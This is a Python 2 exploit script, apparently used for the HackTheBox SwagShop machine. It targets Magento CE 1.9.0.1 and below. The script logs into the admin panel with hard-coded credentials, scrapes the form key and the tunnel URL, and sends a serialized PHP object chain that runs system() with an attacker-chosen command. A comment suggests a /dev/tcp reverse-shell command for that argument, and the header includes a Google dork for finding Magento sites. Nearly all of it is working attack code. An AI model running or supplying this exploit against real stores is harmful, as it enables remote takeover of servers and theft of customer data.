Post Auth Magento RCE for reverse shell (HTB SwagShop)
#!/usr/bin/python | |
# Exploit Title: Magento CE < 1.9.0.1 Post Auth RCE | |
# Google Dork: "Powered by Magento" | |
# Date: 08/18/2015 | |
# Exploit Author: @Ebrietas0 || http://ebrietas0.blogspot.com | |
# Vendor Homepage: http://magento.com/ | |
# Software Link: https://www.magentocommerce.com/download | |
# Version: 1.9.0.1 and below | |
# Tested on: Ubuntu 15, ubuntu 18.04 | |
# CVE : none | |
""" | |
Known problems and their fixes:
(1) | |
Installing the Python 2 mechanize dependency on Kali 2023:
```bash | |
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py | |
sudo python2 get-pip.py | |
sudo pip2 install mechanize | |
``` | |
(2)
mechanize raises `mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'`
once the username control has been added by hand; the script works around it by selecting the first matching control by index (nr=0) instead of assigning by name.
""" | |
from hashlib import md5 | |
import sys | |
import re | |
import base64 | |
import mechanize | |
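def usage():
    """Print the command-line usage to stdout and exit.

    The message is formatted with ``sys.argv[0]`` so the invoked script
    name appears in both the synopsis and the example; the original
    left the two ``%s`` placeholders unsubstituted and printed them
    literally.

    Raises:
        SystemExit: always, via ``sys.exit()``.
    """
    # Parenthesised single expression: valid under both Python 2 (print
    # statement) and Python 3 (print function).
    print("Usage: python %s <target> <argument>\nExample: python %s http://localhost \"uname -a\""
          % (sys.argv[0], sys.argv[0]))
    sys.exit()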
# Exactly two positional arguments are required; usage() prints help and exits.
if len(sys.argv) != 3:
    usage()
# Command-line args
target = sys.argv[1]
arg = sys.argv[2] # rshell command like: bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1"
# Config.
# Admin credentials used for the login form below (hard-coded; edit per target).
username = 'forme'
password = 'forme'
php_function = 'system' # Note: we can only pass 1 argument to the function
# Site-specific value: it is folded into the md5 hash below, so a mismatch
# makes the final request fail rather than succeed.
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml
# POP chain to pivot into call_user_exec
# Built with %-formatting; each (len, value) pair must stay consistent, so
# the serialized length fields are derived from the strings themselves.
payload = 'O:8:\"Zend_Log\":1:{s:11:\"\00*\00_writers\";a:2:{i:0;O:20:\"Zend_Log_Writer_Mail\":4:{s:16:' \
          '\"\00*\00_eventsToMail\";a:3:{i:0;s:11:\"EXTERMINATE\";i:1;s:12:\"EXTERMINATE!\";i:2;s:15:\"' \
          'EXTERMINATE!!!!\";}s:22:\"\00*\00_subjectPrependText\";N;s:10:\"\00*\00_layout\";O:23:\"' \
          'Zend_Config_Writer_Yaml\":3:{s:15:\"\00*\00_yamlEncoder\";s:%d:\"%s\";s:17:\"\00*\00' \
          '_loadedSection\";N;s:10:\"\00*\00_config\";O:13:\"Varien_Object\":1:{s:8:\"\00*\00_data\"' \
          ';s:%d:\"%s\";}}s:8:\"\00*\00_mail\";O:9:\"Zend_Mail\":0:{}}i:1;i:2;}}' % (len(php_function), php_function,
                                                                                    len(arg), arg)
# Setup the mechanize browser and options
br = mechanize.Browser()
# Left commented out; enable to route traffic through a local intercepting proxy for debugging.
#br.set_proxies({"http": "localhost:8080"})
br.set_handle_robots(False)
# Fetch the login page and select its first form.
request = br.open(target)
br.select_form(nr=0)
br.form.new_control('text', 'login[username]', {'value': username}) # Had to manually add username control.
br.form.fixup()
"""
debug: mechanize._form_controls.AmbiguityError: more than one control matching name 'login[username]'
for control in br.form.controls:
if control.name == 'login[username]':
print(control)
<TextControl(login[username]=)>
<TextControl(login[username]=forme)>
so, choose the first control
"""
# Two controls share this name after new_control(); address the first by index (nr=0).
br.form.find_control(name="login[username]", nr=0).value = username # instead of br['login[username]'] = username
br['login[password]'] = password
br.method = "POST"
request = br.submit()
content = request.read()
# Scrape two values from the post-login page. re.search() returns None when the
# marker is absent (e.g. login failed), so .group(1) then raises AttributeError.
# The (.*) captures are greedy and rely on each marker appearing once per line.
url = re.search("ajaxBlockUrl = \'(.*)\'", content)
url = url.group(1)
key = re.search("var FORM_KEY = '(.*)'", content)
key = key.group(1)
# Follow-up request carrying the scraped form key; the response is scraped
# for the URL used in the final request.
request = br.open(url + 'block/tab_orders/period/7d/?isAjax=true', data='isAjax=false&form_key=' + key)
tunnel = re.search("src=\"(.*)\?ga=", request.read())
tunnel = tunnel.group(1)
# Python 2 only: b64encode() returns str here, so concatenating with
# install_date and the URL pieces works; under Python 3 it returns bytes
# and these concatenations raise TypeError.
payload = base64.b64encode(payload)
gh = md5(payload + install_date).hexdigest()
exploit = tunnel + '?ga=' + payload + '&h=' + gh
try:
    request = br.open(exploit)
except (mechanize.HTTPError, mechanize.URLError) as e:
    # Print the error response body; a non-2xx status is the only failure reported.
    print e.read()